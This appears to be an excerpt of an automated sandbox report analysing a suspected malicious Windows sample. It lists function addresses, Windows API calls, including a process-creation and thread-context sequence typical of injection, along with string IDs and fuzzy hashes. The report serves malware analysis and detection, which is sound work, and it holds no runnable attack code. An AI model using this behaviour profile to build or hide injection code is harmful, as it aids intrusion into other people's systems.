                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: 0306ffc66f523e8c6df8a599478515d64c742d973a12719455ad7c07ffa8c794
                                                        • Instruction ID: 486481baf0eb302dcfd1d81800687f1a97a7b565a961184d7f1172d47353ad06
                                                        • Opcode Fuzzy Hash: 0306ffc66f523e8c6df8a599478515d64c742d973a12719455ad7c07ffa8c794
                                                        • Instruction Fuzzy Hash: 1E114575610208BFDB208F64DC80EAEBBB8EF45740F01846DF905E7210E2729E409BA0
                                                        Function 00F73238 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00F739F3
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F73A89
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F73AAB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668345500.0000000000F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F71000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f71000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                        • Instruction ID: fbf01f93f444e036a6b2b1793d227efbd707580e13185044449b23efa802b3bc
                                                        • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                        • Instruction Fuzzy Hash: 2C62FB30A14658DBEB24CFA4C841BDEB376EF58300F1091A9D10DEB394E7799E81DB5A
                                                        Function 0082955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C4EE5: _fseek.LIBCMT ref: 007C4EFD
                                                          • Part of subcall function 00829734: _wcscmp.LIBCMT ref: 00829824
                                                          • Part of subcall function 00829734: _wcscmp.LIBCMT ref: 00829837
                                                        • _free.LIBCMT ref: 008296A2
                                                        • _free.LIBCMT ref: 008296A9
                                                        • _free.LIBCMT ref: 00829714
                                                          • Part of subcall function 007E2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,007E9A24), ref: 007E2D69
                                                          • Part of subcall function 007E2D55: GetLastError.KERNEL32(00000000,?,007E9A24), ref: 007E2D7B
                                                        • _free.LIBCMT ref: 0082971C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction ID: 7afb7955d57276fac01f3f2ec2195c9350de2e289d67d4b428d68659fb2d0579
                                                        • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction Fuzzy Hash: 10515BB1A04268EFDF249F65DC85A9EBBB9FF48300F10049EF249A3241DB755A80CF58
                                                        Function 007E470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction ID: c3657be4da76fecce3eeac7b6d9c654a19599e76888952728a66fc3304b279c5
                                                        • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction Fuzzy Hash: 8D41A675A027C5ABDB18CE6BC8849AE77A6EF4D360F24857DE815C7640E778DD408B80
                                                        Function 007C7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 007FEA39
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 007FEA83
                                                          • Part of subcall function 007C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007C4743,?,?,007C37AE,?), ref: 007C4770
                                                          • Part of subcall function 007E0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007E07B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                        • String ID: X
                                                        • API String ID: 3777226403-3081909835
                                                        • Opcode ID: 26eedb95a51af1f963b769c3366e255866fe8e74a45883d488024173660656dd
                                                        • Instruction ID: ad6c310a20f64281dbbc20b1b333f7f63cb05757f95f52022748aa19ae789036
                                                        • Opcode Fuzzy Hash: 26eedb95a51af1f963b769c3366e255866fe8e74a45883d488024173660656dd
                                                        • Instruction Fuzzy Hash: 32216271A14248DBCB559F98C849BEE7BF8AF49714F00805DE508A7241DFB85989CF91
                                                        Function 008298E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 008298F8
                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0082990F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: 82e651122b5ca991c8fa2f877f591da318407d3533a66c7472b3118bfe17a227
                                                        • Instruction ID: 0694cbc2ae5d9e1765e03d35a87456403695d741648112150556685913d2c6af
                                                        • Opcode Fuzzy Hash: 82e651122b5ca991c8fa2f877f591da318407d3533a66c7472b3118bfe17a227
                                                        • Instruction Fuzzy Hash: BAD05E7958031DABDB509BA0DC0EF9AB73CF704700F0042B1BB54D11A2EAB09598CB91
                                                        Function 0083CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2af2c8ff753828010570fb2bba58bb30b67c64387fdbb3d845bd899b9aef9697
                                                        • Instruction ID: 38bd12c8c32d4f923abae75793adb8273026ff4fa975b3f188fffac8ccfb1c0b
                                                        • Opcode Fuzzy Hash: 2af2c8ff753828010570fb2bba58bb30b67c64387fdbb3d845bd899b9aef9697
                                                        • Instruction Fuzzy Hash: 19F113716083059FCB14DF28C484A6ABBE5FFC8314F14892EF8999B251DB74E945CF82
                                                        Function 007CF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007E0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007E0193
                                                          • Part of subcall function 007E0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 007E019B
                                                          • Part of subcall function 007E0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007E01A6
                                                          • Part of subcall function 007E0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007E01B1
                                                          • Part of subcall function 007E0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 007E01B9
                                                          • Part of subcall function 007E0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 007E01C1
                                                          • Part of subcall function 007D60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007CF930), ref: 007D6154
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007CF9CD
                                                        • OleInitialize.OLE32(00000000), ref: 007CFA4A
                                                        • CloseHandle.KERNEL32(00000000), ref: 008045C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID:
                                                        • API String ID: 1986988660-0
                                                        • Opcode ID: fbcc9dafabd5874690177ac20d1534b0f9a5333a370fe38749c34ee67de67360
                                                        • Instruction ID: 0736d47e83df9ab3706d7861f68db05134d7db5895d2cd2d0133ce4120dcb3c8
                                                        • Opcode Fuzzy Hash: fbcc9dafabd5874690177ac20d1534b0f9a5333a370fe38749c34ee67de67360
                                                        • Instruction Fuzzy Hash: 3E819AF4901A40CFC784EFBDA959A197BE5FB99306790812EE119CB372EB744488CF19
                                                        Function 007C434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 007C4370
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007C4415
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007C4432
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$_memset
                                                        • String ID:
                                                        • API String ID: 1505330794-0
                                                        • Opcode ID: 9ff53578f782ef03283d5d3b855a7dc4ff4f2d9969fd5719a2bdb95a748a83a4
                                                        • Instruction ID: 97bb02cbe242424f6ee460d92821fe24b6b45a858c0e84764833d15479575b31
                                                        • Opcode Fuzzy Hash: 9ff53578f782ef03283d5d3b855a7dc4ff4f2d9969fd5719a2bdb95a748a83a4
                                                        • Instruction Fuzzy Hash: B93191B0504741DFD721DF28D894B9BBBF8FB59308F00092EE69A92251EB75A944CB52
                                                        Function 007E571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 007E5733
                                                          • Part of subcall function 007EA16B: __NMSG_WRITE.LIBCMT ref: 007EA192
                                                          • Part of subcall function 007EA16B: __NMSG_WRITE.LIBCMT ref: 007EA19C
                                                        • __NMSG_WRITE.LIBCMT ref: 007E573A
                                                          • Part of subcall function 007EA1C8: GetModuleFileNameW.KERNEL32(00000000,008833BA,00000104,?,00000001,00000000), ref: 007EA25A
                                                          • Part of subcall function 007EA1C8: ___crtMessageBoxW.LIBCMT ref: 007EA308
                                                          • Part of subcall function 007E309F: ___crtCorExitProcess.LIBCMT ref: 007E30A5
                                                          • Part of subcall function 007E309F: ExitProcess.KERNEL32 ref: 007E30AE
                                                          • Part of subcall function 007E8B28: __getptd_noexit.LIBCMT ref: 007E8B28
                                                        • RtlAllocateHeap.NTDLL(00EC0000,00000000,00000001,00000000,?,?,?,007E0DD3,?), ref: 007E575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: 4c931fdefa95b0fce458b456403d3a64991c4ede2b8ae0833f04c571ba8729d6
                                                        • Instruction ID: 32e747a40bafd7655488ccae8e23d86e2dc74a9a7fb211a95dc06361d28e2752
                                                        • Opcode Fuzzy Hash: 4c931fdefa95b0fce458b456403d3a64991c4ede2b8ae0833f04c571ba8729d6
                                                        • Instruction Fuzzy Hash: 4A012875203BD9DAD610277BEC4AA2E77989F8E766F110425F409AB1C2DF7C9C004761
                                                        Function 008298A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00829548,?,?,?,?,?,00000004), ref: 008298BB
                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00829548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008298D1
                                                        • CloseHandle.KERNEL32(00000000,?,00829548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008298D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: 35f39fbfd5482908120da244959c32b54dc66dbcc64fb7ab20c755516ca1cef1
                                                        • Instruction ID: 6e6d7b747716c03af1855114e070e68d4348ccc58a55333b5df2d93ee89590fd
                                                        • Opcode Fuzzy Hash: 35f39fbfd5482908120da244959c32b54dc66dbcc64fb7ab20c755516ca1cef1
                                                        • Instruction Fuzzy Hash: 36E08636140224B7D7221F64EC09FCA7B59FB07B60F144124FB54A90E187B12511D798
                                                        Function 00828D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00828D1B
                                                          • Part of subcall function 007E2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,007E9A24), ref: 007E2D69
                                                          • Part of subcall function 007E2D55: GetLastError.KERNEL32(00000000,?,007E9A24), ref: 007E2D7B
                                                        • _free.LIBCMT ref: 00828D2C
                                                        • _free.LIBCMT ref: 00828D3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                        • Instruction ID: 81c10356eac68a581871a4d3da830868d37e77806b69622799773c6cd327bfc3
                                                        • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                        • Instruction Fuzzy Hash: 7BE012A1743651C6DF24E579BD44B9313DC9F5C352714091EB50DD7187CE68F8878524
                                                        Function 007CA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CALL
                                                        • API String ID: 0-4196123274
                                                        • Opcode ID: 7f3d3c7882ed68146acce1b930443faa2c907b94f1b39fd6648d9b5f1a84311d
                                                        • Instruction ID: 70293fb9fbae68a87bca9041e9833a539b11084cc97763c8d02f6d03cfc98736
                                                        • Opcode Fuzzy Hash: 7f3d3c7882ed68146acce1b930443faa2c907b94f1b39fd6648d9b5f1a84311d
                                                        • Instruction Fuzzy Hash: C8222670608245DFC724DF24C495F6AB7E1BF84304F14896DE99A9B362DB39EC85CB82
                                                        Function 007C4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: EA06
                                                        • API String ID: 4104443479-3962188686
                                                        • Opcode ID: 249a6ba41dc1a430aaf21293d414ee0339655c21d59115dca0279ced60070101
                                                        • Instruction ID: d83c5f93d73c4578b4998780b56f0c9919c698b13d8e431339da9b3c685968c7
                                                        • Opcode Fuzzy Hash: 249a6ba41dc1a430aaf21293d414ee0339655c21d59115dca0279ced60070101
                                                        • Instruction Fuzzy Hash: 80413C71B04158A7DF31AB648C75FBE7FB29B45310F28446DEE839B282D62C9D4483A1
                                                        Function 007C7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                        • Instruction ID: 9e128192ad3c742a48aa718461d71acb3c828a78b2ff76ca565deb032141b395
                                                        • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                        • Instruction Fuzzy Hash: 8A314DB1604606AFC708DF69C891E69B3A9FF48320715C62DE519CB291EF78ED60CB90
                                                        Function 007C47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsThemeActive.UXTHEME ref: 007C4834
                                                          • Part of subcall function 007E336C: __lock.LIBCMT ref: 007E3372
                                                          • Part of subcall function 007E336C: DecodePointer.KERNEL32(00000001,?,007C4849,00817C74), ref: 007E337E
                                                          • Part of subcall function 007E336C: EncodePointer.KERNEL32(?,?,007C4849,00817C74), ref: 007E3389
                                                          • Part of subcall function 007C48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007C4915
                                                          • Part of subcall function 007C48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007C492A
                                                          • Part of subcall function 007C3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007C3B68
                                                          • Part of subcall function 007C3B3A: IsDebuggerPresent.KERNEL32 ref: 007C3B7A
                                                          • Part of subcall function 007C3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,008852F8,008852E0,?,?), ref: 007C3BEB
                                                          • Part of subcall function 007C3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 007C3C6F
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007C4874
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                        • String ID:
                                                        • API String ID: 1438897964-0
                                                        • Opcode ID: f8264aeaf1e0241bc7a9ccd1ab8125801880c7bff06b1539ba5c87e214057cfa
                                                        • Instruction ID: d9e05f589cf9cc771c9d9ad5042f393d71c4bf5159a2eee31c086d8a4b42ff80
                                                        • Opcode Fuzzy Hash: f8264aeaf1e0241bc7a9ccd1ab8125801880c7bff06b1539ba5c87e214057cfa
                                                        • Instruction Fuzzy Hash: 3A118971908341DBC700EF29E809A0EBFE8FF99750F10491EF040972B2DBB49A48CB92
                                                        Function 007E0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
